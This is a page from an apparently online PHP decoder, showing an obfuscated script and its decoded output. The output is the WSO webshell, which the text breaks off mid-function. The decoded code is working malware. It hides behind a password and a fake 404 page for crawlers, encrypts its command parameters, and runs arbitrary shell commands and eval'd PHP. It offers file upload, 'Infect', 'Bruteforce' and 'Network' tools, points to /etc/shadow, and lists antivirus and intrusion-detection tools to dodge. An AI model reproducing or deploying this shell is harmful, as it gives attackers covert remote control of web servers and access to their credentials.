Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $Lix = "\x3dMye9\x622jzhI\x2b7xmI5LWZZf2H/L\x41Lx8OqQJSqih\x2b082VRX4\x6220Ieo5i2\x..

Decoded Output download

?>b'<?php
//--------------Watching webshell!--------------
//-----------------Password---------------------
$ = "973e5f1df7a74ffbe52bf508955c4425";
$ = true;
$ = \'UTF-8\';
$ = \'FilesMan\';
$ = md5($_SERVER[\'HTTP_USER_AGENT\']);
if (!isset($_COOKIE[md5($_SERVER[\'HTTP_HOST\'])."key"])) {
	prototype(md5($_SERVER[\'HTTP_HOST\'])."key", $);
}
if(empty($_POST[\'charset\']))
	$_POST[\'charset\'] = $;
if (!isset($_POST[\'ne\'])) {
	if(isset($_POST[\'a\'])) $_POST[\'a\'] = iconv("utf-8", $_POST[\'charset\'], decrypt($_POST[\'a\'],$_COOKIE[md5($_SERVER[\'HTTP_HOST\'])."key"]));
	if(isset($_POST[\'c\'])) $_POST[\'c\'] = iconv("utf-8", $_POST[\'charset\'], decrypt($_POST[\'c\'],$_COOKIE[md5($_SERVER[\'HTTP_HOST\'])."key"]));
	if(isset($_POST[\'p1\'])) $_POST[\'p1\'] = iconv("utf-8", $_POST[\'charset\'], decrypt($_POST[\'p1\'],$_COOKIE[md5($_SERVER[\'HTTP_HOST\'])."key"]));
	if(isset($_POST[\'p2\'])) $_POST[\'p2\'] = iconv("utf-8", $_POST[\'charset\'], decrypt($_POST[\'p2\'],$_COOKIE[md5($_SERVER[\'HTTP_HOST\'])."key"]));
	if(isset($_POST[\'p3\'])) $_POST[\'p3\'] = iconv("utf-8", $_POST[\'charset\'], decrypt($_POST[\'p3\'],$_COOKIE[md5($_SERVER[\'HTTP_HOST\'])."key"]));
}
function decrypt($str,$pwd){$pwd=base64_encode($pwd);$str=base64_decode($str);$enc_chr="";$enc_str="";$i=0;while($i<strlen($str)){for($j=0;$j<strlen($pwd);$j++){$enc_chr=chr(ord($str[$i])^ord($pwd[$j]));$enc_str.=$enc_chr;$i++;if($i>=strlen($str))break;}}return base64_decode($enc_str);}
@ini_set(\'error_log\',NULL);
@ini_set(\'log_errors\',0);
@ini_set(\'max_execution_time\',0);
@set_time_limit(0);
if(version_compare(PHP_VERSION, \'5.3.0\', \'<\')){
    set_magic_quotes_runtime(0);
}
@define(\'VERSION\', \'4.2.6\');
if(!function_exists(\'get_magic_quotes_gpc\') || get_magic_quotes_gpc()) {
	function stripslashes_array($array) {
		return is_array($array) ? array_map(\'stripslashes_array\', $array) : stripslashes($array);
	}
	$_POST = stripslashes_array($_POST);
    $_COOKIE = stripslashes_array($_COOKIE);
}
/* () 11.2011 oRb */
if(!empty($)) {
    if(isset($_POST[\'pass\']) && (md5($_POST[\'pass\']) == $))
        prototype(md5($_SERVER[\'HTTP_HOST\']), $);
    if (!isset($_COOKIE[md5($_SERVER[\'HTTP_HOST\'])]) || ($_COOKIE[md5($_SERVER[\'HTTP_HOST\'])] != $))
        hardLogin();
}
if(!isset($_COOKIE[md5($_SERVER[\'HTTP_HOST\']) . \'ajax\']))
    $_COOKIE[md5($_SERVER[\'HTTP_HOST\']) . \'ajax\'] = (bool)$;
function hardLogin() {
		if(!empty($_SERVER[\'HTTP_USER_AGENT\'])) {
		  $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
		  if(preg_match(\'/\' . implode(\'|\', $userAgents) . \'/i\', $_SERVER[\'HTTP_USER_AGENT\'])) {
		  header(\'HTTP/1.0 404 Not Found\');
		  exit;
		  }
		}
	die("</br></br><pre align=center><form method=post style=\'font-family:Nunito, sans-serif;color:#1a1a1a; text-shadow: 2px 0 0 #0d52bf, -2px 0 0 #0d52bf, 0 2px 0 #0d52bf, 0 -2px 0 #0d52bf, 1px 1px #0d52bf, -1px -1px 0 #0d52bf, 1px -1px 0 #0d52bf, -1px 1px 0 #0d52bf; text-align: center;\'><h3>Hello <br>Welcome to wso webshell redesignated by mIcHy AmRaNe</h3><br><input placeholder=\'password\' type=password name=pass style=\'border-radius: 4px 0px 0px 4px; background-color:whitesmoke;border:1px solid #FFF;outline:none;\' required><input type=submit name=\'watching\' value=\'>>\' style=\'height: 20px; border: none; border-radius: 0px 4px 4px 0px;background-color:#0d52bf;color:#fff;cursor:pointer;\'></form></pre>
<div class=\'view\'><div class=\'plane main\'><div class=\'circle\'></div><div class=\'circle\'></div><div class=\'circle\'></div><div class=\'circle\'></div><div class=\'circle\'></div><div class=\'circle\'></div></div></div>
<style>body,html{background:#1a1a1a;overflow:hidden;width:100%;height:100%;position:absolute;z-index: -2;}.view{position:absolute;top:0;left:0;right:0;bottom:0;-webkit-perspective:400;perspective:400;z-index: -2;}.plane{width:120px;height:120px;-webkit-transform-style:preserve-3d;transform-style:preserve-3d;position:absolute;z-index: -2;}.plane.main{position:absolute;top:0;left:0;right:0;bottom:0;margin:auto;-webkit-transform:rotateX(60deg) rotateZ(-30deg);transform:rotateX(60deg) rotateZ(-30deg);-webkit-animation:rotate 20s infinite linear;animation:rotate 20s infinite linear;z-index: -2;}.plane.main .circle{width:120px;height:120px;position:absolute;-webkit-transform-style:preserve-3d;transform-style:preserve-3d;border-radius:100%;box-sizing:border-box;box-shadow:0 0 60px #a10705,inset 0 0 60px #7a0000;z-index: -2;}.plane.main .circle::after,.plane.main .circle::before{content:\'\';display:block;position:absolute;top:0;left:0;right:0;bottom:0;margin:auto;width:5%;height:5%;border-radius:100%;background:#5d0819;box-sizing:border-box;box-shadow:0 0 60px 2px #7a0000;z-index: -2;}.plane.main .circle::before{-webkit-transform:translateZ(-90px);transform:translateZ(-90px)}.plane.main .circle::after{-webkit-transform:translateZ(90px);transform:translateZ(90px)}.plane.main .circle:nth-child(1){-webkit-transform:rotateZ(72deg) rotateX(63.435deg);transform:rotateZ(72deg) rotateX(63.435deg)}.plane.main .circle:nth-child(2){-webkit-transform:rotateZ(144deg) rotateX(63.435deg);transform:rotateZ(144deg) rotateX(63.435deg)}.plane.main .circle:nth-child(3){-webkit-transform:rotateZ(216deg) rotateX(63.435deg);transform:rotateZ(216deg) rotateX(63.435deg)}.plane.main .circle:nth-child(4){-webkit-transform:rotateZ(288deg) rotateX(63.435deg);transform:rotateZ(288deg) rotateX(63.435deg)}.plane.main .circle:nth-child(5){-webkit-transform:rotateZ(360deg) rotateX(63.435deg);transform:rotateZ(360deg) rotateX(63.435deg)}@-webkit-keyframes rotate{0%{-webkit-transform:rotateX(0) rotateY(0) rotateZ(0);transform:rotateX(0) rotateY(0) rotateZ(0)}100%{-webkit-transform:rotateX(360deg) rotateY(360deg) rotateZ(360deg);transform:rotateX(360deg) rotateY(360deg) rotateZ(360deg)}}@keyframes rotate{0%{-webkit-transform:rotateX(0) rotateY(0) rotateZ(0);transform:rotateX(0) rotateY(0) rotateZ(0)}100%{-webkit-transform:rotateX(360deg) rotateY(360deg) rotateZ(360deg);transform:rotateX(360deg) rotateY(360deg) rotateZ(360deg)}}; h2{color:whitesmoke; font-weight:bold; text-decoration:underline;}</style>");
}
if(strtolower(substr(PHP_OS,0,3)) == "win")
	$os = \'win\';
else
	$os = \'nix\';
$safe_mode = @ini_get(\'safe_mode\');
if(!$safe_mode)
    error_reporting(0);
$disable_functions = @ini_get(\'disable_functions\');
$home_cwd = @getcwd();
if(isset($_POST[\'c\']))
	@chdir($_POST[\'c\']);
$cwd = @getcwd();
if($os == \'win\') {
	$home_cwd = str_replace("\", "/", $home_cwd);
	$cwd = str_replace("\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != \'/\')
	$cwd .= \'/\';
/* () 04.2015 Pirat */
function hardHeader() {
	if(empty($_POST[\'charset\']))
		$_POST[\'charset\'] = $GLOBALS[\'\'];
	echo "<html><head><meta http-equiv=\'Content-Type\' content=\'text/html; charset=" . $_POST[\'charset\'] . "\'><title>" . $_SERVER[\'HTTP_HOST\'] . " - WSO " . VERSION ."</title>
    <link href=\'https://fonts.googleapis.com/css?family=Nunito\' rel=\'stylesheet\'>
    <link rel=\'stylesheet\' href=\'https://cdn.rawgit.com/kimeiga/bahunya/css/bahunya-0.1.3.css\'>
<style>
	body {background-color:#060A10; color:#e1e1e1; margin:0; font:normal 75% Arial, Helvetica, sans-serif; } canvas{ display: block; vertical-align: bottom;}
	#particles-js{width: 100%; height: 100px; background-color: #060a10; background-image: url(\'\'); background-repeat: no-repeat; background-size: cover; background-position: 50% 50%;}
	body,td,th	{font:10pt tahoma,arial,verdana,sans-serif,Lucida Sans;margin:0;vertical-align:top;}
	table.info	{color:#C3C3C3;}
	table#toolsTbl {background-color: #060A10;}
	span,h1,a	{color:#68b723 !important;}
	span		{font-weight:bolder;}
	h1			{border-left:5px solid #a10705;padding:2px 5px;font:14pt Verdana;background-color:#10151c;margin:0px;}
	div.content	{padding:5px;margin-left:5px;background-color:#060a10;}
	a			{text-decoration:none;}
	a:hover		{text-decoration:underline;}
	.tooltip::after {background:#0663D5;color:#FFF;content: attr(data-tooltip);margin-top:-50px;display:block;padding:6px 10px;position:absolute;visibility:hidden;}
	.tooltip:hover::after {opacity:1;visibility:visible;}
	.ml1		{border:1px solid #202832;padding:5px;margin:0;overflow:auto;}
	.bigarea	{min-width:100%;max-width:100%;height:400px;}
	input, textarea, select	{margin:0;color:#fff;background-color:#202832;border:none;font:9pt Courier New;outline:none;}
	label {position:relative}
	label:after{border-bottom:2px solid #999;border-right:2px solid #999;content:\'\';display:block;height:5px;margin-top:-4px;pointer-events:none;position:absolute;right:12px;top:50%;-webkit-transform-origin:66% 66%;-ms-transform-origin:66% 66%;transform-origin:66% 66%;-webkit-transform:rotate(45deg);-ms-transform:rotate(45deg);transform:rotate(45deg);-webkit-transition:all .15s ease-in-out;transition:all .15s ease-in-out;width:5px}
	label:before {content:\'\';right:0; top:0;width:17px; height:17px;background:#202832;position:absolute;pointer-events:none;display:block;}
	form		{margin:0px;}
	#toolsTbl	{text-align:center;}
	#fak 		{background:none;}
	#fak td 	{padding:5px 0 0 0;}
	iframe		{border:1px solid #060a10;}
	.toolsInp	{width:300px}
	.main th	{text-align:left;background-color:#060a10;}
	.main tr:hover{background-color:#354252;}
	.main td, th{vertical-align:middle;}
	input[type=\'submit\']{background-color:#0d52bf; color:#fafafa;}
	input[type=\'button\']{background-color:#0d52bf; color:#fafafa;}
	input[type=\'submit\']:hover{background-color:#002e99; color:#fafafa;}
	input[type=\'button\']:hover{background-color:#002e99; color:#fafafa;}
	.l1			{background-color:#202832;}
	pre			{font:9pt Courier New;}
</style>
<script>
    var c_ = \'" . htmlspecialchars($GLOBALS[\'cwd\']) . "\';
    var a_ = \'" . htmlspecialchars(@$_POST[\'a\']) ."\'
    var charset_ = \'" . htmlspecialchars(@$_POST[\'charset\']) ."\';
    var p1_ = \'" . ((strpos(@$_POST[\'p1\'],"
")!==false)?\'\':htmlspecialchars($_POST[\'p1\'],ENT_QUOTES)) ."\';
    var p2_ = \'" . ((strpos(@$_POST[\'p2\'],"
")!==false)?\'\':htmlspecialchars($_POST[\'p2\'],ENT_QUOTES)) ."\';
    var p3_ = \'" . ((strpos(@$_POST[\'p3\'],"
")!==false)?\'\':htmlspecialchars($_POST[\'p3\'],ENT_QUOTES)) ."\';
    var d = document;
	function encrypt(str,pwd){if(pwd==null||pwd.length<=0){return null;}str=base64_encode(str);pwd=base64_encode(pwd);var enc_chr=\'\';var enc_str=\'\';var i=0;while(i<str.length){for(var j=0;j<pwd.length;j++){enc_chr=str.charCodeAt(i)^pwd.charCodeAt(j);enc_str+=String.fromCharCode(enc_chr);i++;if(i>=str.length)break;}}return base64_encode(enc_str);}
	function utf8_encode(argString){var string=(argString+\'\');var utftext=\'\',start,end,stringl=0;start=end=0;stringl=string.length;for(var n=0;n<stringl;n++){var c1=string.charCodeAt(n);var enc=null;if(c1<128){end++;}else if(c1>127&&c1<2048){enc=String.fromCharCode((c1>>6)|192)+String.fromCharCode((c1&63)|128);}else{enc=String.fromCharCode((c1>>12)|224)+String.fromCharCode(((c1>>6)&63)|128)+String.fromCharCode((c1&63)|128);}if(enc!==null){if(end>start){utftext+=string.slice(start,end);}utftext+=enc;start=end=n+1;}}if(end>start){utftext+=string.slice(start,stringl);}return utftext;}
	function base64_encode(data){var b64 = \'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\';var o1,o2,o3,h1,h2,h3,h4,bits,i=0,ac=0,enc=\'\',tmp_arr=[];if (!data){return data;}data=utf8_encode(data+\'\');do{o1=data.charCodeAt(i++);o2=data.charCodeAt(i++);o3=data.charCodeAt(i++);bits=o1<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;tmp_arr[ac++]=b64.charAt(h1)+b64.charAt(h2)+b64.charAt(h3)+b64.charAt(h4);}while(i<data.length);enc=tmp_arr.join(\'\');switch (data.length%3){case 1:enc=enc.slice(0,-2)+\'==\';break;case 2:enc=enc.slice(0,-1)+\'=\';break;}return enc;}
	function set(a,c,p1,p2,p3,charset) {
		if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
		if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
		if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
		if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
		if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
		d.mf.a.value = encrypt(d.mf.a.value,\'".$_COOKIE[md5($_SERVER[\'HTTP_HOST\'])."key"]."\');
		d.mf.c.value = encrypt(d.mf.c.value,\'".$_COOKIE[md5($_SERVER[\'HTTP_HOST\'])."key"]."\');
		d.mf.p1.value = encrypt(d.mf.p1.value,\'".$_COOKIE[md5($_SERVER[\'HTTP_HOST\'])."key"]."\');
		d.mf.p2.value = encrypt(d.mf.p2.value,\'".$_COOKIE[md5($_SERVER[\'HTTP_HOST\'])."key"]."\');
		d.mf.p3.value = encrypt(d.mf.p3.value,\'".$_COOKIE[md5($_SERVER[\'HTTP_HOST\'])."key"]."\');
		if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
	}
	function g(a,c,p1,p2,p3,charset) {
		set(a,c,p1,p2,p3,charset);
		d.mf.submit();
	}
	function a(a,c,p1,p2,p3,charset) {
		set(a,c,p1,p2,p3,charset);
		var params = \'ajax=true\';
		for(i=0;i<d.mf.elements.length;i++)
			params += \'&\'+d.mf.elements[i].name+\'=\'+encodeURIComponent(d.mf.elements[i].value);
		sr(\'" . addslashes($_SERVER[\'REQUEST_URI\']) ."\', params);
	}
	function sr(url, params) {
		if (window.XMLHttpRequest)
			req = new XMLHttpRequest();
		else if (window.ActiveXObject)
			req = new ActiveXObject(\'Microsoft.XMLHTTP\');
        if (req) {
            req.onreadystatechange = processReqChange;
            req.open(\'POST\', url, true);
            req.setRequestHeader (\'Content-Type\', \'application/x-www-form-urlencoded\');
            req.send(params);
        }
	}
	function processReqChange() {
		if( (req.readyState == 4) )
			if(req.status == 200) {
				var reg = new RegExp(\"(\\d+)([\\S\\s]*)\", \'m\');
				var arr=reg.exec(req.responseText);
				eval(arr[2].substr(0, arr[1]));
			} else alert(\'Request error!\');
	}
</script>
<head><body><div style=\'position:absolute;background-color:rgba(95, 110, 130, 0.3);width:100%;top:0;left:0;\'>
<form method=post name=mf style=\'display:none;\'>
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>
<input type=hidden name=p3>
<input type=hidden name=charset>
</form>";
	$freeSpace = @diskfreespace($GLOBALS[\'cwd\']);
	$totalSpace = @disk_total_space($GLOBALS[\'cwd\']);
	$totalSpace = $totalSpace?$totalSpace:1;
	$release = @php_uname(\'r\');
	$kernel = @php_uname(\'s\');
	$explink = \'http://nullrefer.com/?https://www.exploit-db.com/search/?action=search&description=\';
	if(strpos(\'Linux\', $kernel) !== false)
		$explink .= urlencode(\'Linux Kernel \' . substr($release,0,6));
	else
		$explink .= urlencode($kernel . \' \' . substr($release,0,3));
	if(!function_exists(\'posix_getegid\')) {
		$user = @get_current_user();
		$uid = @getmyuid();
		$gid = @getmygid();
		$group = "?";
	} else {
		$uid = @posix_getpwuid(@posix_geteuid());
		$gid = @posix_getgrgid(@posix_getegid());
		$user = $uid[\'name\'];
		$uid = $uid[\'uid\'];
		$group = $gid[\'name\'];
		$gid = $gid[\'gid\'];
	}
	$cwd_links = \'\';
	$path = explode("/", $GLOBALS[\'cwd\']);
	$n=count($path);
	for($i=0; $i<$n-1; $i++) {
		$cwd_links .= "<a href=\'#\' onclick=\'g(\"FilesMan\",\"";
		for($j=0; $j<=$i; $j++)
			$cwd_links .= $path[$j].\'/\';
		$cwd_links .= "\")\'>".$path[$i]."/</a>";
	}
	$charsets = array(\'UTF-8\', \'Windows-1251\', \'KOI8-R\', \'KOI8-U\', \'cp866\');
	$opt_charsets = \'\';
	foreach($charsets as $)
		$opt_charsets .= \'<option value="\'.$.\'" \'.($_POST[\'charset\']==$?\'selected\':\'\').\'>\'.$.\'</option>\';
	$m = array(\'Sec. Info\'=>\'SecInfo\',\'Files\'=>\'FilesMan\',\'Console\'=>\'Console\',\'Infect\'=>\'Infect\',\'Sql\'=>\'Sql\',\'Php\'=>\'Php\',\'Safe mode\'=>\'SafeMode\',\'String tools\'=>\'StringTools\',\'Bruteforce\'=>\'Bruteforce\',\'Network\'=>\'Network\');
	if(!empty($GLOBALS[\'\']))
	$m[\'Logout\'] = \'Logout\';
	$m[\'Self remove\'] = \'SelfRemove\';
	$menu = \'\';
	foreach($m as $k => $v)
		$menu .= \'<th>[ <a href="#" onclick="g(\'\'.$v.\'\',null,\'\',\'\',\'\')">\'.$k.\'</a> ]</th>\';
	$drives = "";
	if ($GLOBALS[\'os\'] == \'win\') {
		foreach(range(\'c\',\'z\') as $drive)
		if (is_dir($drive.\':\\'))
			$drives .= \'<a href="#" onclick="g(\'FilesMan\',\'\'.$drive.\':/\')">[ \'.$drive.\' ]</a> \';
	}
	/* () 08.2015 dmkcv */
	echo \'<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:\'.($GLOBALS[\'os\'] == \'win\'?\'<br>Drives:\':\'\').\'</span></td>\'.
		 \'<td><nobr>\'.substr(@php_uname(), 0, 120).\' <a href="https://nullrefer.com/?https://www.google.com/search?q=\'.urlencode(@php_uname()).\'" target="_blank">[ Google ]</a> <a href="\'.$explink.\'" target=_blank>[ Exploit-DB ]</a></nobr><br>\'.$uid.\' ( \'.$user.\' ) <span>Group:</span> \'.$gid.\' ( \' .$group. \' )<br>\'.@phpversion().\' <span>Safe mode:</span> \'.($GLOBALS[\'safe_mode\']?\'<font color=#a10705>ON</font>\':\'<font color=#f9c440><b>OFF</b></font>\').\' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a> <span>Datetime:</span> \'.date(\'Y-m-d H:i:s\').\'<br>\'.viewSize($totalSpace).\' <span>Free:</span> \'.viewSize($freeSpace).\' (\'.round(100/($totalSpace/$freeSpace),2).\'%)<br>\'.$cwd_links.\' \'.viewPermsColor($GLOBALS[\'cwd\']).\' <a href=# onclick="g(\'FilesMan\',\'\'.$GLOBALS[\'home_cwd\'].\'\',\'\',\'\',\'\')">[ home ]</a><br>\'.$drives.\'</td>\'.
		 \'<td width=1 align=right><nobr><label><select onchange="g(null,null,null,null,null,this.value)">\'.$opt_charsets.\'</select></label><br><span>Server IP:</span><br>\'.gethostbyname($_SERVER["HTTP_HOST"]).\'<br><span>Client IP:</span><br>\'.$_SERVER[\'REMOTE_ADDR\'].\'</nobr></td></tr></table>\'.
		 \'<table style="background-color:#0d52bf;" cellpadding=3 cellspacing=0 width=100%><tr>\'.$menu.\'</tr></table><div>\';
}
function hardFooter() {
	$is_writable = is_writable($GLOBALS[\'cwd\'])?" <font color=\'#f9c440\'>[ Writeable ]</font>":" <font color=#a10705>(Not writable)</font>";
    echo "
</div>
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%>
	<tr>
		<td><form onsubmit=\"".( function_exists(\'actionFilesMan\')? "g(null,this.c.value,\'\');":\'\' )."return false;\"><span>Change dir:</span><br><input class=\'toolsInp\' type=text name=c value=\'" . htmlspecialchars($GLOBALS[\'cwd\']) ."\'><input type=submit value=\'submit\'></form></td>
		<td><form onsubmit=\"".(function_exists(\'actionFilesTools\')? "g(\'FilesTools\',null,this.f.value);":\'\' )."return false;\"><span>Read file:</span><br><input class=\'toolsInp\' type=text name=f required><input type=submit value=\'submit\'></form></td>
	</tr><tr>
		<td><form onsubmit=\"".( function_exists(\'actionFilesMan\')? "g(\'FilesMan\',null,\'mkdir\',this.d.value);":\'\' )."return false;\"><span>Make dir:</span>$is_writable<br><input class=\'toolsInp\' type=text name=d required><input type=submit value=\'submit\'></form></td>
		<td><form onsubmit=\"".( function_exists(\'actionFilesTools\')? "g(\'FilesTools\',null,this.f.value,\'mkfile\');":\'\' )."return false;\"><span>Make file:</span>$is_writable<br><input class=\'toolsInp\' type=text name=f required><input type=submit value=\'submit\'></form></td>
	</tr><tr>
		<td><form onsubmit=\"".( function_exists(\'actionConsole\')? "g(\'Console\',null,this.c.value);":\'\' )."return false;\"><span>Execute:</span><br><input class=\'toolsInp\' type=text name=c value=\'\'><input type=submit value=\'submit\'></form></td>
		<td><form method=\'post\' ".( (!function_exists(\'actionFilesMan\'))? " onsubmit=\"return false;\" ":\'\' )."ENCTYPE=\'multipart/form-data\'>
		<input type=hidden name=a value=\'FilesMan\'>
		<input type=hidden name=c value=\'" . htmlspecialchars($GLOBALS[\'cwd\']) ."\'>
		<input type=hidden name=p1 value=\'uploadFile\'>
		<input type=hidden name=ne value=\'\'>
		<input type=hidden name=charset value=\'" . (isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\') . "\'>
		<span>Upload file:</span>$is_writable<br><input class=\'toolsInp\' type=file name=f[]  multiple><input type=submit value=\'submit\'></form><br  ></td>
	</tr></table></div>
	<!-- particles --> <div id=\'particles-js\'></div><script src=\'https://cdn.jsdelivr.net/particles.js/2.0.0/particles.min.js\'></script>
	<script>particlesJS(\'particles-js\', {\'particles\':{\'number\':{\'value\':80,\'density\':{\'enable\':true,\'value_area\':800}},\'color\':{\'value\':\'#ffffff\'},\'shape\':{\'type\':\'triangle\',\'stroke\':{\'width\':0,\'color\':\'#000000\'},\'polygon\':{\'nb_sides\':5},\'image\':{\'src\':\'img/github.svg\',\'width\':100,\'height\':100}},\'opacity\':{\'value\':0.5,\'random\':true,\'anim\':{\'enable\':false,\'speed\':1,\'opacity_min\':0.1,\'sync\':false}},\'size\':{\'value\':3,\'random\':true,\'anim\':{\'enable\':false,\'speed\':40,\'size_min\':0.1,\'sync\':false}},\'line_linked\':{\'enable\':true,\'distance\':200,\'color\':\'#ffffff\',\'opacity\':0.4,\'width\':1},\'move\':{\'enable\':true,\'speed\':1,\'direction\':\'none\',\'random\':true,\'straight\':false,\'out_mode\':\'out\',\'bounce\':false,\'attract\':{\'enable\':false,\'rotateX\':10000,\'rotateY\':10000}}},\'interactivity\':{\'detect_on\':\'canvas\',\'events\':{\'onhover\':{\'enable\':true,\'mode\':\'grab\'},\'onclick\':{\'enable\':true,\'mode\':\'repulse\'},\'resize\':true},\'modes\':{\'grab\':{\'distance\':200,\'line_linked\':{\'opacity\':0.5}},\'bubble\':{\'particles_nb\':2}}},\'retina_detect\':true});</script>
	</body></html>";
}
if (!function_exists("posix_getpwuid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getpwuid\')===false)) { function posix_getpwuid($p) {return false;} }
if (!function_exists("posix_getgrgid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getgrgid\')===false)) { function posix_getgrgid($p) {return false;} }
function ex($in) {
	$ = \'\';
	if (function_exists(\'exec\')) {
		@exec($in,$);
		$ = @join("
",$);
	} elseif (function_exists(\'passthru\')) {
		ob_start();
		@passthru($in);
		$ = ob_get_clean();
	} elseif (function_exists(\'system\')) {
		ob_start();
		@system($in);
		$ = ob_get_clean();
	} elseif (function_exists(\'shell_exec\')) {
		$ = shell_exec($in);
	} elseif (is_resource($f = @popen($in,"r"))) {
		$ = "";
		while(!@feof($f))
			$ .= fread($f,1024);
		pclose($f);
	}else return " Unable to execute command
";
	return ($==\'\'?" Query did not return anything
":$);
}
function viewSize($s) {
	if($s >= 1073741824)
		return sprintf(\'%1.2f\', $s / 1073741824 ). \' GB\';
	elseif($s >= 1048576)
		return sprintf(\'%1.2f\', $s / 1048576 ) . \' MB\';
	elseif($s >= 1024)
		return sprintf(\'%1.2f\', $s / 1024 ) . \' KB\';
	else
		return $s . \' B\';
}
function perms($p) {
	if (($p & 0xC000) == 0xC000)$i = \'s\';
	elseif (($p & 0xA000) == 0xA000)$i = \'l\';
	elseif (($p & 0x8000) == 0x8000)$i = \'-\';
	elseif (($p & 0x6000) == 0x6000)$i = \'b\';
	elseif (($p & 0x4000) == 0x4000)$i = \'d\';
	elseif (($p & 0x2000) == 0x2000)$i = \'c\';
	elseif (($p & 0x1000) == 0x1000)$i = \'p\';
	else $i = \'u\';
	$i .= (($p & 0x0100) ? \'r\' : \'-\');
	$i .= (($p & 0x0080) ? \'w\' : \'-\');
	$i .= (($p & 0x0040) ? (($p & 0x0800) ? \'s\' : \'x\' ) : (($p & 0x0800) ? \'S\' : \'-\'));
	$i .= (($p & 0x0020) ? \'r\' : \'-\');
	$i .= (($p & 0x0010) ? \'w\' : \'-\');
	$i .= (($p & 0x0008) ? (($p & 0x0400) ? \'s\' : \'x\' ) : (($p & 0x0400) ? \'S\' : \'-\'));
	$i .= (($p & 0x0004) ? \'r\' : \'-\');
	$i .= (($p & 0x0002) ? \'w\' : \'-\');
	$i .= (($p & 0x0001) ? (($p & 0x0200) ? \'t\' : \'x\' ) : (($p & 0x0200) ? \'T\' : \'-\'));
	return $i;
}
function viewPermsColor($f) {
	if (!@is_readable($f))
		return \'<font color=#FF0000><b>\'.perms(@fileperms($f)).\'</b></font>\';
	elseif (!@is_writable($f))
		return \'<font color=white><b>\'.perms(@fileperms($f)).\'</b></font>\';
	else
		return \'<font color=#f9c440><b>\'.perms(@fileperms($f)).\'</b></font>\';
}
function hardScandir($dir) {
    if(function_exists("scandir")) {
        return scandir($dir);
    } else {
        $dh  = opendir($dir);
        while (false !== ($filename = readdir($dh)))
            $files[] = $filename;
        return $files;
    }
}
function which($p) {
	$path = ex(\'which \' . $p);
	if(!empty($path))
		return $path;
	return false;
}
function actionRC() {
	if(!@$_POST[\'p1\']) {
		$a = array(
			"uname" => php_uname(),
			"php_version" => phpversion(),
			"VERSION" => VERSION,
			"safemode" => @ini_get(\'safe_mode\')
		);
		echo serialize($a);
	} else {
		eval($_POST[\'p1\']);
	}
}
function prototype($k, $v) {
    $_COOKIE[$k] = $v;
    setcookie($k, $v);
}
function actionSecInfo() {
	hardHeader();
	echo \'<h1>Server security information</h1><div class=content>\';
	function showSecParam($n, $v) {
		$v = trim($v);
		if($v) {
			echo \'<span>\' . $n . \': </span>\';
			if(strpos($v, "
") === false)
				echo $v . \'<br>\';
			else
				echo \'<pre class=ml1>\' . $v . \'</pre>\';
		}
	}
	showSecParam(\'Server software\', @getenv(\'SERVER_SOFTWARE\'));
    if(function_exists(\'apache_get_modules\'))
        showSecParam(\'Loaded Apache modules\', implode(\', \', apache_get_modules()));
	showSecParam(\'Disabled PHP Functions\', $GLOBALS[\'disable_functions\']?$GLOBALS[\'disable_functions\']:\'none\');
	showSecParam(\'Open base dir\', @ini_get(\'open_basedir\'));
	showSecParam(\'Safe mode exec dir\', @ini_get(\'safe_mode_exec_dir\'));
	showSecParam(\'Safe mode include dir\', @ini_get(\'safe_mode_include_dir\'));
	showSecParam(\'cURL support\', function_exists(\'curl_version\')?\'enabled\':\'no\');
	$temp=array();
	if(function_exists(\'mysql_get_client_info\'))
		$temp[] = "MySql (".mysql_get_client_info().")";
	if(function_exists(\'mssql_connect\'))
		$temp[] = "MSSQL";
	if(function_exists(\'pg_connect\'))
		$temp[] = "PostgreSQL";
	if(function_exists(\'oci_connect\'))
		$temp[] = "Oracle";
	showSecParam(\'Supported databases\', implode(\', \', $temp));
	echo \'<br>\';
	if($GLOBALS[\'os\'] == \'nix\') {
            showSecParam(\'Readable /etc/passwd\', @is_readable(\'/etc/passwd\')?"yes <a href=\'#\' onclick=\'g(\"FilesTools\", \"/etc/\", \"passwd\")\'>[view]</a>":\'no\');
            showSecParam(\'Readable /etc/shadow\', @is_readable(\'/etc/shadow\')?"yes <a href=\'#\' onclick=\'g(\"FilesTools\", \"/etc/\", \"shadow\")\'>[view]</a>":\'no\');
            showSecParam(\'OS version\', @file_get_contents(\'/proc/version\'));
            showSecParam(\'Distr name\', @file_get_contents(\'/etc/issue.net\'));
            if(!$GLOBALS[\'safe_mode\']) {
                $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');
                $danger = array(\'kav\',\'nod32\',\'bdcored\',\'uvscan\',\'sav\',\'drwebd\',\'clamd\',\'rkhunter\',\'chkrootkit\',\'iptables\',\'ipfw\',\'tripwire\',\'shieldcc\',\'portsentry\',\'snort\',\'ossec\',\'lidsadm\',\'tcplodg\',\'sxid\',\'logcheck\',\'logwatch\',\'sysmask\',\'zmbscap\',\'sawmill\',\'wormscan\',\'ninja\');
                $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');
                echo \'<br>\';
                $temp=array();
                foreach ($userful as $)
